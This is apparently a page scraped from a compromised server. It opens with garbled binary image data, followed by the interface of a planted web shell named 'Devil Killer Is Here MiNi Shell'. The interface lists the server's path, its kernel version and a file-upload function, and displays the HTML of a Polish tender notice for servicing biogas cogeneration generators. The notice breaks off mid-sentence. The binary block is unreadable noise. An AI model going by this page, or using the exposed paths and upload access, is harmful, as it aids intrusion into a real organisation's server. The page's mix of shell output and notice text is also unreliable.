JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230605/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230605/0024710901-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> (07) Wykonanie przeglądów serwisowych zespołów kogeneracyjnych elektrowni biogazowej wraz z dostawą materiałów eksploatacyjnych do wykonania przeglądów wykonywanych przez pracowników Zamawiającego </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">&#34;EKO DOLINA&#34; SPÓŁKA Z OGRANICZONĄ ODPOWIEDZIALNOŚCIĄ</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 191680713</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Al. Parku Krajobrazowego 99</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Łężyce</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">84-207</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL634 - Gdański</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">+48 58 672 50 00</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">+48 58 672 74 74</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@ekodolina.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://ekodolina.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - osoba prawna, o której mowa w art. 4 pkt 3 ustawy (podmiot prawa publicznego)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Środowisko</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> (07) Wykonanie przeglądów serwisowych zespołów kogeneracyjnych elektrowni biogazowej wraz z dostawą materiałów eksploatacyjnych do wykonania przeglądów wykonywanych przez pracowników Zamawiającego </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-6b6bb420-0388-11ee-b70f-ae2d9e28ec7b</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00247109</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-06-05</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/ekodolina <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/ekodolina</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Postępowanie prowadzone jest w<br/>języku polskim w formie elektronicznej za pośrednictwem Platformy Zakupowej (dalej jako „Platforma”) pod adresem:<br/>https://platformazakupowa.pl/pn/ekodolina 2. Komunikacja między Zamawiającym a Wykonawcami, w tym wszelkie oświadczenia,<br/>wnioski, zawiadomienia oraz informacje, przekazywane są w formie elektronicznej za pośrednictwem Platformy i formularza „Wyślij<br/>wiadomość” znajdującego się na stronie danego postępowania. Za datę przekazania (wpływu) oświadczeń, wniosków, zawiadomień<br/>oraz informacji przyjmuje się datę ich przesłania za pośrednictwem platformy poprzez kliknięcie przycisku „wyślij wiadomość” po<br/>których pojawi się komunikat, że wiadomość została wysłana do Zamawiającego. 3. Zamawiający z Wykonawcami będzie<br/>przekazywał informacje w formie elektronicznej za pośrednictwem Platformy. Informacje dotyczące odpowiedzi na pytania, zmiany<br/>swz, zmiany terminu składania i otwarcia ofert zamawiający będzie zamieszczał na platformie w sekcji “Komunikaty”. 4.<br/>Korespondencja, której zgodnie z obowiązującymi przepisami adresatem jest konkretny Wykonawca będzie przekazywana w formie<br/>elektronicznej za pośrednictwem Platformy do tego konkretnego Wykonawcy.<br/>5.Zamawiający, określa niezbędne wymagania sprzętowo - aplikacyjne<br/>umożliwiające pracę na Platformie Zakupowej, tj.: a) stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż<br/>512 kb/s, b) komputer klasy PC lub MAC, o następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2 GHZ lub jego<br/>nowsza wersja, jeden z systemów operacyjnych – MS Windows 7, Mac Os x 10 4, Linux, lub ich nowsze wersje. c) zainstalowana<br/>dowolna przeglądarka internetowa, w przypadku<br/>Internet Explorer minimalnie wersja11.0.,d) włączona obsługa JavaScript, e) zainstalowany program Adobe Acrobat Reader, lub inny<br/>obsługujący format plików .pdf.6. Zalecane formaty przesyłanych danych, tj. plików o wielkości do 75 MB. - Zalecany format:<br/>.pdf.7.Zalecany format kwalifikowanego podpisu elektronicznego: a) dokumenty w formacie .pdf zaleca się podpisywać formatem<br/>PAdES; b) dopuszcza się podpisanie dokumentów w formacie innym niż .pdf, wtedy zaleca się użyć formatu XAdES.8. Wykonawca<br/>przystępując do niniejszego postępowania o udzielenie zamówienia publicznego, akceptuje warunki korzystania z Platformy<br/>Zakupowej, określone w Regulaminie zamieszczonym na stronie internetowej pod adresem https://platformazakupowa.pl/strona/1-<br/>regulamin w zakładce „Regulamin&#34; oraz uznaje go za wiążący.9. Zamawiający informuje, że<br/>instrukcje korzystania z Platformy Zakupowej dotyczące w szczególności logowania, pobrania dokumentacji, składania wniosków o<br/>wyjaśnienie treści SWZ, składania ofert oraz innych czynności podejmowanych w niniejszym postępowaniu przy użyciu Platformy<br/>Zakupowej znajdują się w zakładce „Instrukcje dla Wykonawców&#34; na stronie internetowej pod adresem<br/>https://platformazakupowa.pl/strona/45-instrukcje Zamawiający dopuszcza w szczególności następujący format przesyłanych<br/>danych: .xml, .pdf, .doc., .docx, .rtf, .odt. .xls .xlsx .ods .rar .zip.7z(zgodnie z Rozporządzeniem Rady Ministrów z dnia 12 kwietnia<br/>2012r. w sprawie Krajowych Ram Interoperacyjności, minimalnych wymagań dla rejestrów publicznych i wymiany informacji w<br/>postaci elektronicznej oraz minimalnych wymagań dla systemów teleinformatycznych (Dz. U. z 2017r. poz. 2247).</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">EKO DOLINA Sp. z o.o. przedkłada Państwu poniższe informacje: 1.Administratorem<br/>Pani/Pana danych osobowych jest EKO DOLINA Sp. z o.o., Aleja Parku Krajobrazowego 99, 84-207 Łężyce, NIP: 5881834882,<br/>REGON: 191680713, KRS: 0000030282. 2. Inspektorem Ochrony Danych Osobowych jest Pan Michał Filipowski.3. W sprawach<br/>związanych z przetwarzaniem danych osobowych, w szczególności dotyczących realizacji obowiązków Administratora danych<br/>osobowych oraz realizacji praw podmiotów danych osobowych należy kontaktować się z Administratorem danych osobowych<br/>kierując korespondencję na adres wskazany powyżej lub na adres e-mail: IOD@ekodolina.pl Pełna treść klauzuli informacyjnej<br/>RODO znajduje się w rozdz. XXXIV SWZ.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">IZP-P/07/2023/serwis generatorów</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest:<br/>a)	Wykonanie dwóch przeglądów serwisowych (P3 i P10) zespołu kogeneracyjnego typu Jenbacher JMS 316 GS – B.L, o nominalnej mocy elektrycznej 800 kW (zwanego G1) wg. załącznika nr 5 do SWZ.<br/>b)	Wykonanie przeglądu serwisowego (PR 1.2) zespołu kogeneracyjnego typu KLASIK TBG 700, o nominalnej mocy elektrycznej 663 kW, napędzany silnikiem Waukesha VGF P48GLD (zwany G2), wg załącznika nr 6 do SWZ.<br/>c)	Dostawa materiałów wymienionych w załączniku nr 7 do SWZ.<br/>d)	Wykonanie cyklicznych badań próbek oleju wg załącznika nr 9 do SWZ. Próbki oleju z trzech zespołów kogeneracyjnych, 1 x Jenbacher JMS 316 GS – B.L (G1), 2 x KLASIK TBG 700, napędzanych silnikami Waukesha VGF P48GLD (tak zwane G2 oraz G3).<br/>e)	Udzielanie przez cały okres obowiązywania umowy całodobowych konsultacji dotyczących zagadnień związanych z pracą trzech zespołów kogeneracyjnych tak zwanych kolejno G1, G2 i G3.<br/>Ponadto, Wykonawca we własnym zakresie i na własny koszt zawrze i utrzyma w mocy, przez cały okres związania umową oraz zapewni ciągłość, ubezpieczenia odpowiedzialności cywilnej (OC), w której rodzaj działalności objętej ochroną będzie zgodny z zakresem zobowiązań wykonywanych w ramach umowy. Szczegóły OC we wzorze umowy. <br/><br/>1. Podstawowe dane techniczne zespołów kogeneracyjnych<br/><br/>Zespół kogeneracyjny nr 1 (G1)<br/> Producent: Jenbacher<br/> Rok produkcji: 2018r. <br/>	Moc znamionowa: 800 kW<br/>	Napięcie znamionowe: 400 V<br/>Podzespoły agregatu	Producent	Typ	Nr fabryczny<br/>Silnik	Jenbacher	JMS 316 GS – B.L	1360382<br/>Generator	Stamford	PE 734 B2	450 – 15471J<br/><br/>Zespół kogeneracyjny nr 2 (G2)<br/>	Producent:	Motorgas<br/>	Rok produkcji: 2004r. <br/>	Moc znamionowa: 663 kW<br/>	Napięcie znamionowe: 400 V<br/>Podzespoły agregatu	Producent	Typ	Nr fabryczny<br/>Silnik	Waukesha	VGF P48GLD	1S/N C-81017/01<br/>Generator	Leroy Somer	LSAC 50.1 S2	162261/3<br/><br/>Zespół kogeneracyjny nr 3 (G3)<br/>	Producent:	Motorgas<br/>	Rok produkcji: 2004r. <br/>	Moc znamionowa: 663 kW<br/>	Napięcie znamionowe: 400 V<br/>Podzespoły agregatu	Producent	Typ	Nr fabryczny<br/>Silnik	Waukesha	VGF P48GLD	1S/N C-80998/01<br/>Generator	Leroy Somer	LSAC 50.1 S2	162261/1<br/><br/><br/>Wykaz usług objętych umową<br/>a)	Prace serwisowe zgodnie z następującym harmonogramem<br/>-	Przeprowadzenie przeglądów serwisowych wg. załączonych harmonogramów przeglądów serwisowych zespołów kogeneracyjnych (Załącznik nr 5 i Załącznik nr 6).<br/>b)	Inne usługi<br/>-	W przypadkach sytuacji awaryjnych monitoring parametrów pracy zespołów kogeneracyjnych realizowany poprzez zdalny interfejs, umożliwiający podgląd parametrów pracy zespołów kogeneracyjnych. W celu realizacji tego zadania Zamawiający udostępni Wykonawcy łącze internetowe pozwalające na zdalne łączenie się z interfejsem elektrowni – zespołów kogeneracyjnych. <br/>- Całodobowa konsultacja telefoniczna – w sytuacjach awaryjnych i innych sytuacjach pracy zespołów kogeneracyjnych odbiegających od normy, celem m.in. ustalenia ewentualnych działań mających za zadanie usuwanie zaistniałej awarii czy poprawę nieprawidłowej pracy zespołów kogeneracyjnych.<br/>-	W czasie wykonywania serwisów planowanych kontrola ogólnego stanu technicznego zespołów kogeneracyjnych. Informowanie użytkownika o aktualnym stanie technicznym zespołów kogeneracyjnych. <br/>W przypadku zaobserwowania nieprawidłowości, wnioskowanie o naprawę lub wymianę uszkodzonych elementów. Proponowanie, na podstawie obserwacji pracy zespołów kogeneracyjnych, wprowadzania zmian w ich konstrukcji bądź w systemie sterowania, mających na celu poprawę efektywności lub niezawodności pracy zespołów kogeneracyjnych. <br/>- Wykonywanie okresowych badań oleju smarnego (co 400 mth – dla każdego zespołu kogeneracyjnego), w tym dostarczenie pojemników niezbędnych do pobrania próbek.<br/>- Dostawa materiałów wymienionych w Załączniku nr 7.<br/>2.	Wykaz czynności objętych planowanymi przeglądami<br/>Usługa serwisowa zespołów kogeneracyjnych <br/> Umowa serwisowa obejmuje wykonanie przeglądów serwisowych w zakresie zgodnym z załącznikiem nr 5 i 6 jak również dostawę materiałów do przeglądów wykonywanych przez pracowników Zamawiającego – załącznik nr 7. Wykonawca rozpocznie systematyczne okresowe przeglądy serwisowe każdego zespołu kogeneracyjnego po podpisaniu umowy serwisowej. <br/>	Do prac przewidzianych w harmonogramach wykonawca zabezpieczy w tym celu wszelkie niezbędne materiały i części zamienne bez obciążania Zamawiającego dodatkowymi kosztami związanymi z zakupem i dostarczeniem niezbędnych części zamiennych i materiałów eksploatacyjnych (oleje, płyny, uszczelki, filtry, świece zapłonowe, zawory, czujniki, sondy lambda, itp.).<br/>3.	Termin wykonania zamówienia<br/>Umowa obowiązywać będzie w okresie niezbędnym do wykonania wszystkich przeglądów serwisowych ujętych w ich harmonogramie dla dwóch zespołów kogeneracyjnych przez okres 6 miesięcy od daty podpisania umowy.<br/>4.	Warunki realizacji zamówienia.<br/>1)	Prace serwisowe przy poszczególnych zespołach kogeneracyjnych należy wykonywać po wcześniejszym, co najmniej tygodniowym zgłoszeniu przez Zamawiającego. Jednocześnie wyłączony z eksploatacji może być tylko jeden zespół kogeneracyjny, a jego wyłączenie z powodu prowadzonych prac serwisowych powinno być możliwie jak najkrótsze, jeżeli nie wybiega zakresem poza czynności określone w specyfikacji prac (załącznik nr 5 i 6), to nie może przekroczyć 5 dni roboczych.<br/>2)	Wykonawca na własny koszt będzie systematycznie dokonywał badań parametrów jakościowych oleju smarnego w trakcie trwania umowy serwisowej – co najmniej co 400 mth pracy trzech jednostek. Pobór próbek oleju smarnego wykonywać będą pracownicy Zamawiającego w obecności Wykonawcy. Za przekazanie próbek do badań odpowiada Wykonawca. Wyniki badań wraz z wnioskami będą przekazywane drogą elektroniczną Zamawiającemu.<br/>3)	Gwarancją objęte zostaną wszystkie elementy składowe zespołów kogeneracyjnych podlegające czynnościom serwisowym oraz demontaż, montaż elementów nie będących bezpośrednio przedmiotem tych prac, ale których demontaż był wymuszony lub związany z technologią prowadzenia tych prac, z wyłączeniem części i materiałów szybko zużywających się, których okres żywotności jest krótszy niż 36 m-ce, w wymiarze wynikającym z wykazu przewidywanego czasu zdatności technicznej – nie krótszy niż 12 miesięcy, przy czym, dla części i materiałów szybko zużywających się, okres ten nie może być krótszy niż odstęp czasowy pomiędzy kolejnymi Serwisami Wykonawcy.<br/>4)	Wykonawca zobowiązuje się przeprowadzać bieżącą, ogólną kontrolę sprawności technicznej serwisowanych zespołów kogeneracyjnych. W przypadku wykrycia nieprawidłowości Wykonawca zobowiązuje się poinformować o tym przedstawiciela Zmawiającego. Wszystkie uwagi powinny być zapisane w protokole/raporcie zgodnie z załącznikiem nr 8 w rubryce „wnioski i zalecenia po wykonanym przeglądzie”, akceptacja zamawiającego zostanie potwierdzona wpisem w załączniku nr 8 w rubryce „Wnioski/uwagi Zamawiającego”<br/>5)	Zamawiający nie dopuszcza stosowania przez Wykonawcę części i materiałów innych, niż dopuszczone do stosowania przez producenta zespołów kogeneracyjnych. <br/>6)	Wykonawca w trakcie realizacji umowy zobowiązany jest do stosowania tylko certyfikowanych przyrządów pomiarowych z aktualnymi świadectwami kalibracji okresowej.<br/>7)	Wszystkie zużyte materiały i wymienione części zamienne Wykonawca jest zobligowany przekazać Zamawiającemu wraz z protokołem ich przekazania. <br/>8)	Wykonawca po przeprowadzonym serwisie wystawia szczegółowy protokół dla danego zespołu kogeneracyjnego.<br/>9)	Protokół/raport wraz z wymaganymi załącznikami musi zostać przekazany Zamawiającemu w dniu zakończenia przeglądu.<br/>10)	Zamawiający, podpisem na protokole/raporcie serwisowym, potwierdza wykonanie serwisu bez uwag, co jest tytułem do wystawienia faktury VAT za dany przegląd serwisowy. <br/>11)	Za wykonane usługi serwisowe Zamawiający będzie płacił ustaloną cenę ryczałtową po każdym wykonanym serwisie (w przypadku, gdy protokół serwisowy zostanie przyjęty bez uwag).<br/>12)	Za dostarczenie materiałów (wymienionych w zał. nr 7) Zamawiający będzie płacił ustaloną cenę za poszczególne materiały po każdorazowej dostawie.<br/>13)	Za wykonanie badań poszczególnych próbek oleju (wymienionych w zał. nr 9) Zamawiający będzie płacił ustaloną cenę za poszczególne badania w okresach kwartalnych.<br/><br/>Zespół prądotwórczy jest zainstalowany w elektrowni biogazowej zakładu „Eko Dolina” Sp. z o. o. Łężyce.<br/><br/>UWAGA:<br/>W czasie wykonywania umowy Wykonawca zobowiązany jest do przestrzegania przepisów BHP, ppoż. jak i regulaminów obowiązujących w miejscu spełnienia świadczenia m.in. wymogów związanych z systemem zarządzania środowiskowego PN-EN ISO 14001:2015, które są dostępne w biurze Zamawiającego na terenie jego zakładu.<br/>Zamawiający nie przewiduje zwrotu kosztów udziału w postępowaniu. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">50532300-6 - Usługi w zakresie napraw i konserwacji generatorów</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">6 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami oceny ofert:<br/>1) Cena (C) – waga kryterium 100%;<br/>2.	Zasady oceny ofert w poszczególnych kryteriach:<br/>1) Cena (C) – waga 100%<br/><br/>cena najniższa brutto*<br/>C = ------------------------------------------------ x 100 pkt x 100%<br/>cena oferty ocenianej brutto<br/>* spośród wszystkich złożonych ofert niepodlegających odrzuceniu<br/>a) Podstawą przyznania punktów w kryterium „cena” będzie cena ofertowa brutto podana przez Wykonawcę w Formularzu Ofertowym.<br/>b) Cena ofertowa brutto musi uwzględniać wszelkie koszty jakie Wykonawca poniesie w związku z realizacją przedmiotu zamówienia.<br/>2) Punktacja przyznawana ofertom w poszczególnych kryteriach oceny ofert będzie liczona z dokładnością do dwóch miejsc po przecinku, zgodnie z zasadami arytmetyki.<br/>3. W toku badania i oceny ofert Zamawiający może żądać od Wykonawcy wyjaśnień dotyczących treści złożonej oferty, w tym zaoferowanej ceny.<br/>4. Zamawiający udzieli zamówienia Wykonawcy, którego oferta zostanie uznana za najkorzystniejszą.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit a</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit b</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit c</p> <p class="mb-0">Art. 109 ust. 1 pkt 3</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 6</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu na zasadach określonych w Rozdziale XIII SWZ oraz spełniają określone przez Zamawiającego warunki udziału w postępowaniu.<br/>2.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/>1) zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>Wykonawca musi posiadać licencje do dokonywania zmian w systemie sterowania zespołów kogeneracyjnych:<br/>- dla zespołów 